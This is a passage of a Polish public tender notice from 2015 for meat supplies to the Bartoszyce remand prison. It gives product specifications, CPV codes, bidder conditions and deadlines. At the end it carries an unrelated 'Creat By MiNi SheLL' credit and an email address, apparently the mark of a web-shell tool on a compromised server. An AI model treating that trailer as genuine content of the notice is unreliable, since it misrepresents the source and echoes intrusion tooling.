Całe skrawki mięsa wołowego  (mięso  - przepuszczone przez sito z otworami owalnymi) bez tłuszczu zewnętrznego, bez ścięgien i tkanki łącznej, niedopuszczalne mięso z głów,  nóg, żeberek, pachwiny i innych podrobów wołowych. Powierzchnia czysta, nie zakrwawiona, bez opiłków kości. Wygląd 
- w równych odcinkach. Barwa jasnoczerwona do ciemnoczerwonej.  
Podgardle wieprzowe
200
15100000-9
Podgardle wieprzowe świeże. Musi być zachowana jednolitość dostawy tj.: tego samego pochodzenia, tej samej jakości i wielkości, w ramach jednej dostawy .
Wątroba wieprzowa
800
15100000-9
Wątroba wieprzowa świeża, nie mrożona. Powierzchnia czysta, gładka, nie zakrwawiona nie postrzępiona,
 





Schab bez kości






30
    





15100000-9
Element  wieprzowy (przednia część) , pozbawiony kości w kształcie nieforemnego walca; znajduje się w przedniej części półtuszy, tkanka mięśniowa nie przerośnięta tłuszczem. Barwa różowa do czerwonej. Powierzchnia czysta, gładka, nie zakrwawiona nie postrzępiona, bez opiłków kości, przekrwawień, głębszych ponacinań. Mięso schłodzone , nie mrożone. 


Mięso mielone wieprzowe 


800


151 10 000-2
Mięso średnio rozdrobnione mieszane ( mięso z półtusz ) , mięso przepuszczone przez sito z otworami o średnicy 3 mm).  Mięso schłodzone, nie mrożone. Wygląd - opakowania od 400 do 500g.. Barwa jasnoczerwona do ciemnoczerwonej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.35-0, 15.13.11.34-3, 15.13.13.10-1, 15.13.11.00-6, 15.13.11.00-6, 15.13.12.00-7, 15.11.21.00-7, 15.13.10.00-5, 15.11.11.90-7, 15.10.00.00-9, 15.11.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
- Warunek zostanie uznany za spełniony, gdy wykonawca wykaże się spełnieniem tego warunku składając oświadczenie- Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia.
- Warunek zostanie uznany za spełniony, gdy wykonawca wykaże się spełnieniem tego warunku składając oświadczenie- Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
- Warunek zostanie uznany za spełniony, gdy wykonawca wykaże się spełnieniem tego warunku składając oświadczenie- Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej
- Warunek zostanie uznany za spełniony, gdy wykonawca wykaże się spełnieniem tego warunku składając oświadczenie- Załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy
ul. Warszawska 5
11 - 200 Bartoszyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2015 godzina 09:00, miejsce: Areszt Śledczy
ul. Warszawska 5
11 - 200 Bartoszyce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com